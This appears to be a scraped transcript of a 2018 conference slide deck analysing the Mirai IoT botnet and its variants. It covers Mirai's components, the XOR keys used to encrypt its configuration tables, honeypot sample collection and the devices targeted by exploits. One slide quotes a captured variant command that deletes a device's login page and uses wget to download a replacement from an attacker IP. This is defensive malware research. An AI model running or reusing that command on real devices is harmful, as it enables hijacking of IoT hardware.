ZyXEL Success Story: India Mutual Fund Securely Connects Branches with ZyXEL Solution
IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August...
Transcript of IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August...
![Page 2: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/2.jpg)
2
Overview
I. Brief introduction of Mirai II. Anti-analysis and encryption of its configuration III. Lab Setup and Honeypot IV. Mirai Variants - Difference from the original Mirai - Popular variants
![Page 3: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/3.jpg)
3 August 31, 2018
Mirai Overview
![Page 4: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/4.jpg)
4
![Page 5: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/5.jpg)
5
Mirai’s first appearance
• Coded by Anna-senpai • Source Code released on Hackforums.net on Sep 20, 2016
![Page 6: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/6.jpg)
6
Mirai’s Components
• Command and Control Server • Report Server • Loader • Bot - Attack - Killer - Scanner
![Page 7: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/7.jpg)
7
How Mirai Works
![Page 8: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/8.jpg)
8
How Mirai Works
![Page 9: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/9.jpg)
9
How Mirai Works
![Page 10: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/10.jpg)
10
How Mirai Works
![Page 11: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/11.jpg)
11
How Mirai Works
![Page 12: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/12.jpg)
12
How Mirai Works
![Page 13: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/13.jpg)
13
How Mirai Works
![Page 14: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/14.jpg)
14
How Mirai Works
![Page 15: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/15.jpg)
15
Bot Module: Attack
• Attack vectors
![Page 16: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/16.jpg)
16 August 31, 2018
Anti-analysis and Encryption of Configuration Table
![Page 17: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/17.jpg)
17
UPX header magic
![Page 18: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/18.jpg)
18
Anti-analysis
dsjn 0xAD86570B
SNDJ 0x0DF0ADBA
RAW\x0 0xF596A4B5
KSL! 0x085A6508
upx 0x58550000
KTN! 0x0CE7790A
VEN! 0x47413509
ELF!
help
NOOB
GMT!
![Page 19: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/19.jpg)
19
Configuration table
![Page 20: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/20.jpg)
20
Configuration table decryption
table_key = 0xdeadbeef
Xor_key = 0x22
![Page 21: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/21.jpg)
21
Xor Key Used
• ~47 Xor Keys identified
Commonly used keys: Table_key(seed) Xor Key Variants
0xdeadbeef 0x22 27 (Including Mirai)
0xdedefbaf 0x54 17
0xdedeffba 0x45 15
<none> 0x0 (not encrypted) 13
0xdeacfbef 0x66 11
![Page 22: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/22.jpg)
22 August 31, 2018
Catching Live Samples with Honeypot
![Page 23: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/23.jpg)
23
The KAIB Project
• Static analysis • Automated decryption of configuration table • Unpacking if known packer • C2 server and download URLs collection
![Page 24: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/24.jpg)
24
Results
• 21k+ samples collected • 15k+ are Mirai related samples • 120+ variants identified • 500+ C2s Blacklisted
![Page 25: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/25.jpg)
25
Honeypot Setup
• Low interaction • Logs Telnet login attempts • Logs URLs from WGET download attempts • Automatically downloads samples
![Page 26: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/26.jpg)
26
Identifying Mirai Variants
Mirai was named after by the strings/ command:
• /bin/busybox MIRAI
• MIRAI: applet not found
![Page 27: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/27.jpg)
27 August 31, 2018
![Page 28: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/28.jpg)
28
14
41 50
65 76 81
98
117 127
< 2018 Jan-18 Feb-18 Mar-18 Apr-18 May-18 Jun-18 Jul-18 Aug-18
Variant Count
![Page 29: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/29.jpg)
29
Samples processed (2018)
2704 2374
1729
3607
1405
2268
4268
2851
January February March April May June July August
Sample Count Count
![Page 30: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/30.jpg)
30
0
1000
2000
3000
4000
5000
6000
Sample Count per Variant
Count
![Page 31: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/31.jpg)
31
Targeted Architecture
ARM 32-bit architecture (AARCH32)
MIPS I Architecture
Hitachi SuperH
SPARC
Motorola 68000
Intel 80386
PowerPC
Intel 80860
AMD x86-64 architecture
IBM System/370 Processor
![Page 32: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/32.jpg)
32
Targeted Architecture
ARC International ARCompact processor
• Discovered January 2018
• Initially used by Okiru variant
• 1.5 billion products are dispatched per year
Other Variants joining the ARC:
MASUTA SAUCE
OMNI chickenxings
ROOT WICKED
![Page 33: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/33.jpg)
33
Exploits
• 28 Exploits
• At least 16 are Unauthenticated exploits
• 14 exploits are from 2017 & 2018
Airlink101 Digitalzoomstudio Netgear
Apache Hadoop D-LINK NUUO
ASUS GoAhead Realtek
AVTECH Huawei Tutos
Claymore JAWS Vacron
Dasan MikroTik Zyxel
![Page 34: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/34.jpg)
34 August 31, 2018
Main Variants
![Page 35: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/35.jpg)
35
Satori/Okiru
• Believed to be coded by NexusZeta • One of the most popular mod of Mirai • Loader embedded in bot • Included ARC architecture to its targets • Uses exploits to spread • One version mines cryptocurrency
![Page 36: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/36.jpg)
36
Satori/Okiru
![Page 37: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/37.jpg)
37
Satori/Okiru
Scan port 3333: Exploit that targets Claymore software (ETH mining) in order to change the destination wallet
![Page 38: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/38.jpg)
38
Satori/Okiru
3.336721 ETH approx 3.3k USD in January 2018
![Page 39: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/39.jpg)
39
OMG
• Turns IoT device into a proxy server • Contains the original Mirai modules (attack, killer, scanner) • Brute-force login to spread • Discovered February 2018
![Page 40: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/40.jpg)
40
OMG
• Uses 3Proxy, an open-source proxy server • Generates 2 random ports for HTTP and SOCKS proxies
![Page 41: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/41.jpg)
41
OMG
• Adds firewall rule to allow traffic on the generated ports
![Page 42: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/42.jpg)
42
Owari-Sora-Wicked-Omni
• The author calls himself “Wicked” with his friend “Karmaahof”
• Sora uses Aboriginal Linux
• Commonly uses exploits other than default passwords
• 11 used exploits was found in a sample
![Page 43: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/43.jpg)
43
Owari-Sora-Wicked-Omni
![Page 44: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/44.jpg)
44
Owari-Sora-Wicked-Omni
• Scans specific ports by initiating a raw socket SYN
• For an established connection, it will attempt to send a specific exploit
to the device
![Page 45: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/45.jpg)
45
Owari-Sora-Wicked-Omni
rm -rf /web/html/login.html
busybox wget
http://185.246.152.173/me
me -O /web/html/login.html
![Page 46: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/46.jpg)
46
Final thoughts
• More exploits will be added
• More variants will be appearing
• Modification of Encryption of Configuration Table
• Other means to monetize infected IoT devices
![Page 47: IoT: Battle of the Bots - Amazon Web Services...Bot Module: Attack • Attack vectors . 16 August 31, 2018 Anti-analysis and Encryption of Configuration Table ... Dasan MikroTik Zyxel.](https://reader034.fdocuments.in/reader034/viewer/2022042201/5ea1f12c068df116807ecd75/html5/thumbnails/47.jpg)
47 August 31, 2018
QUESTIONS?